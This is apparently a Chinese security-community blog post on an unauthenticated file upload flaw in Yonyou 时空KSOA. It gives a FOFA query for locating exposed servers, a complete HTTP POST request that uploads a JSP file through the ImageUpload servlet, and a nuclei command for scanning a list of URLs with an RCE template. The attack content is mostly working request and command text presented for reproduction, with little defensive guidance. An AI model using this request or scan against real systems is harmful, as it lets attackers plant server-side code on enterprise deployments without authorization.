用友时空KSOA软件前台文件上传漏洞(用友时空最新版本)

漏洞描述

用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业前沿的IT需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。
 


 

网络测绘

app="用友-时空KSOA"

 


 

漏洞复现

图片[1]-用友时空KSOA软件前台文件上传漏洞(用友时空最新版本)-孤勇者社区

POST http://ip:port/servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=111111.jsp&_ZQA_ID=d0d60ec54924481c HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------122739796041499160471980406311
Content-Length: 51
Origin: null
Connection: close
Upgrade-Insecure-Requests: 1

<% out.println("bea86d66a5278f9e6fa1112d2e2f1"); %>

图片[2]-用友时空KSOA软件前台文件上传漏洞(用友时空最新版本)-孤勇者社区

图片[3]-用友时空KSOA软件前台文件上传漏洞(用友时空最新版本)-孤勇者社区

接下来就是漫长的信息收集阶段:

nuclei-pocs方法

nuclei -t yonyou_KSOA_ImageUpload_rce.yaml -l url.txt

图片[4]-用友时空KSOA软件前台文件上传漏洞(用友时空最新版本)-孤勇者社区

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞5赞赏 分享
评论 共2条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像张严0
    • 头像张惨0